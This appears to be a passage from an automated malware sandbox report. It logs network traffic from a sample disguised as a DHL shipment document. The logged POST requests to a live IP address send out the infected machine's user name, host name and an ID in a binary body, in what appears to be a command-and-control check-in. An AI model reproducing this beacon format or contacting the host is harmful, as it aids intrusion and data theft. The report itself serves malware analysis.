                  Mar 21, 2023 07:13:28.111792088 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111812115 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.111850023 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111860991 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.111898899 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111947060 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111991882 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.112008095 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.112081051 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281061888 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281157970 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281245947 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281291962 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281315088 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281349897 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281374931 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281395912 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281443119 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281459093 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281542063 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281586885 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281599045 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281631947 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281687975 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281692982 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281733036 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281785965 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281815052 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281830072 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281877041 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281903982 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.281932116 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.281977892 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282002926 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.282027960 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282082081 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282092094 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.282129049 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.282197952 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.327450037 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.450213909 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450320005 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450367928 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.450449944 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.451137066 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.451137066 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.746226072 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.913429022 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.913705111 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:28.916497946 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.083816051 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.083960056 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.251243114 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829490900 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829539061 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829566956 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829596043 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829613924 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829627037 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829657078 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829679966 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829688072 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829699993 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829720020 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829747915 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829762936 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.829778910 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.829835892 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.996907949 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.996984005 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997034073 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997081995 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997129917 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997149944 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997150898 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997179031 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997246027 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997292995 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997293949 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997342110 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997390032 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997389078 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997436047 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997437954 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997487068 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997533083 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997535944 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997584105 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997631073 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997632027 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997680902 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997726917 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997775078 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997776985 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997823000 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997870922 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:29.997872114 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:29.997915983 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:30.165044069 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165110111 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165162086 CET804970264.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:30.165230036 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:30.165230036 CET4970280192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:34.458470106 CET4970280192.168.2.464.227.48.212

                  HTTP Request Dependency Graph

                  • 64.227.48.212

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44969764.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:21.229954004 CET149OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 190
                  Connection: close
                  Mar 21, 2023 07:13:21.398611069 CET149OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.rujones066656DESKTOP-716T771k08F9C4E9C79A3B52B3F739430Qy2ot
                  Mar 21, 2023 07:13:22.199431896 CET150INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:21 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:22.199486017 CET152INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
                  Data Ascii: ction s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createE
                  Mar 21, 2023 07:13:22.199523926 CET153INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e
                  Data Ascii: nction(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",func
                  Mar 21, 2023 07:13:22.199561119 CET154INData Raw: 6e 3a 20 6e 6f 6e 65 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e
                  Data Ascii: n: none;}</style><style id='wp-block-page-list-inline-css'>.wp-block-navigation .wp-block-page-list{display:flex;flex-direction:var(--navigation-layout-direction,initial);justify-content:var(--navigation-layout-justify,initial);align-items:
                  Mar 21, 2023 07:13:22.199598074 CET156INData Raw: 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 32 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 33 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 34 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 68 35 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: -background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.i
                  Mar 21, 2023 07:13:22.199635029 CET157INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: earch__button{margin-left:0}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-r
                  Mar 21, 2023 07:13:22.199671984 CET159INData Raw: 33 31 33 31 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 23 65 65 65 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 76 65 72 79 2d 64 61 72 6b 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63
                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:22.199707031 CET160INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:22.199743986 CET161INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:22.199781895 CET163INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:22.368415117 CET164INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44969864.227.48.21280C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  TimestampkBytes transferredDirectionData
                  Mar 21, 2023 07:13:22.578655958 CET169OUTPOST /?page_id=215360 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 64.227.48.212
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 2F9D8E6A
                  Content-Length: 190
                  Connection: close
                  Mar 21, 2023 07:13:22.746746063 CET169OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.rujones066656DESKTOP-716T771+08F9C4E9C79A3B52B3F739430qeUS5
                  Mar 21, 2023 07:13:23.510366917 CET170INHTTP/1.0 404 Not Found
                  Date: Tue, 21 Mar 2023 06:13:22 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://robertmario.is/index.php?rest_route=/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 72 73 73 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 67 61 6d 69 6e 67 20 67 69 66 74 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 2f 3f 66 65 65 64 3d 63 6f 6d 6d 65 6e 74 73 2d 72 73 73 32 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 72 6f 62 65 72 74 6d 61 72 69 6f 2e 69 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 31 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; My gaming gifts</title><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Feed" href="http://robertmario.is/?feed=rss2" /><link rel="alternate" type="application/rss+xml" title="My gaming gifts &raquo; Comments Feed" href="http://robertmario.is/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/robertmario.is\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");fun
                  Mar 21, 2023 07:13:23.510523081 CET172INData Raw: 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 65 3d 28 70 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c
